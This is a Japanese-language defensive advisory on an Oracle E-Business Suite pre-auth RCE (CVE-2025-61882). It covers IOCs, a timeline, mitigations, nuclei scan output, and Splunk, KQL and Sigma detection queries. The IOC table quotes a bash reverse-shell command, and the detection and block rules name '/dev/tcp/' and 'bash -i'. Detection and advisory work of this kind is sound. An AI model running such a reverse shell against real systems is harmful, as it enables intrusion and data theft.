
CVE-2025-61882に関する詳細なアドバイザリを提供します。技術分析、IOC、検出クエリ、およびOracle E-Business Suiteの事前認証RCE向けのnucleiベースのエクスプロイトテンプレートを含みます。
| 項目 | 詳細 |
|---|
| 🆔 CVE | CVE‑2025‑61882 |
| 🧾 製品 / コンポーネント | Oracle E‑Business Suite (EBS) — Concurrent Processing / BI Publisher 統合 |
| 📦 影響を受けるバージョン | 12.2.3 → 12.2.14 |
| 🔢 CVSS (v3.1) | 9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H) |
| ⚠️ タイプ | リモートコード実行 (RCE) — 認証不要 |
| 🔥 実環境での悪用 | あり — 大量悪用 / 恐喝キャンペーンが報告済み |
| 📅 開示 / タイムライン | 2025年10月(ベンダー勧告 + 公開ライトアップ)。([oracle.com][1]) |
(上記はベンダー勧告、NVD/CISA、および複数のベンダー分析から統合) ([oracle.com][1])
| 影響領域 | 意味 |
|---|---|
| 🔓 機密性 | 攻撃者は機密性の高い人事/財務/ERPデータを読み取ることが可能 |
| 🛠️ 完全性 | 攻撃者はレコードを変更、バックドアを作成、または設定を変更可能 |
| ⚡ 可用性 | 攻撃者はサービスを妨害、ランサムウェアを実行、またはバックアップを破壊可能 |
| 🧭 リスクレベル | 極めて高い — 重要なERPシステムでの事前認証RCE → 完全なドメインピボットの可能性 |
高影響の悪用とランサムウェアの関連性を報告する参照情報。([Rapid7][2])
OracleおよびインシデントレスポンダーがIOCを公開。以下は勧告およびベンダーのライトアップで報告された代表的な例です。ログとエンドポイントでこれらのパターンを探してください。([oracle.com][1])
| タイプ | 例 |
|---|---|
| 🌐 IP(観測済み) | 200.107.207.26, 185.181.60.11(報告された例示アドレス) |
| 🧾 コマンドパターン | sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1(リバースシェル) |
| 🗂️ ファイルハッシュ | 疑わしいエクスプロイトスクリプトのSHA‑256ハッシュ複数件(完全なリストはベンダー勧告を参照) |
| 🕳️ アーティファクト | 予期しないWebシェル、新しいcronジョブ、異常なIP/ポートへの不審な外部接続 |
完全なIOCリスト(IP、完全なハッシュ、ファイル名)が必要な場合は、ここに貼り付けます — 「IOCを貼り付け」と言ってください。(リンクなし)
| 日付 | イベント |
|---|---|
| 2025年8月9日 | 実環境での悪用活動が最初に報告される(ベンダーテレメトリ)。([crowdstrike.com][4]) |
| 2025年10月初旬 | OracleがEBS向けセキュリティアラート / パッチの提供を発表。([oracle.com][1]) |
| 2025年10月6〜7日 | CISAが既知の悪用された脆弱性 (KEV) カタログにこのCVEを追加(連邦機関向けガイダンス、緩和措置の期限)。([cisa.gov][5]) |
| 2025年10月(継続中) | 複数のベンダーによるライトアップと大量悪用レポート(CrowdStrike、Rapid7、Tenableなど)。([crowdstrike.com][4]) |
| 優先度 | アクション | メモ / サンプル固有情報 |
|---|---|---|
| 1️⃣ 重大 | パッチ適用 影響を受けるEBSインスタンス | バージョン12.2.3〜12.2.14にOracleのセキュリティアラートパッチを直ちに適用。([oracle.com][1]) |
| 2️⃣ 高 | 分離 / 制限 EBS Webエンドポイントへのアクセス | EBSへのインターネット公開HTTP/HTTPSをブロック。信頼できる管理者IPまたはVPNのみ許可。 |
| 3️⃣ 高 | WAFルールの有効化/調整 | エクスプロイトパターンに対するベンダー/コミュニティWAFシグネチャを展開。不審なペイロードをブロック。([Rapid7][2]) |
| 4️⃣ 高 | ハンティング & 検知 | リバースシェルコマンド、異常なファイル書き込み、IOCへの外部接続をログで検索。 |
| 5️⃣ インシデント | 封じ込め & 対応 侵害が判明した場合 | ホストを隔離、フォレンジック証拠を保存、認証情報を変更、クリーンなバックアップから再構築。 |
| 6️⃣ ポリシー | 報告 & 通知 | 規制/契約上の要件の対象となる場合、ポリシーに従って利害関係者と当局に通知(CISA/KEVガイダンスが適用される場合あり)。([nvd.nist.gov][3]) |
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.


Splunk(リバースシェルパターンの検索):
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*")
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw
ELK / Kibana (KQL):
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"
Sigmaルール(概念):
title: Oracle EBS Reverse Shell via HTTP
detection:
selection:
EventID: 1234
ProcessCommandLine|contains: "/dev/tcp/"
condition: selection
(フィールド名はログスキーマに合わせて調整。IOCを使用して絞り込み。)
80/443 をブロック。管理VPNと特定の管理者IPのみ許可。bash -i、/dev/tcp/、base64 -d、または典型的なエクスプロイトペイロードパターンを含むリクエストをブロック。(正確性のために情報源をリストアップ — ここにリンクは貼りませんが、必要に応じて参照できるようにベンダー/権威機関名を記載します。)
このレポートで提供される情報は、認識、防御、および教育目的のみを意図しています。 この情報を使用して、明示的な許可なくシステムを悪用、攻撃、または侵害することは違法であり、刑事および民事罰につながる可能性があります。
🔒 常に推奨パッチを適用し、セキュリティのベストプラクティスに従い、テストは管理された環境でのみ実施してください。
🧾 このレポートは公式のベンダー勧告に代わるものではありません — 最終的な修復手順については、常にOracle Security Alertsおよび権威あるガイダンスを参照してください。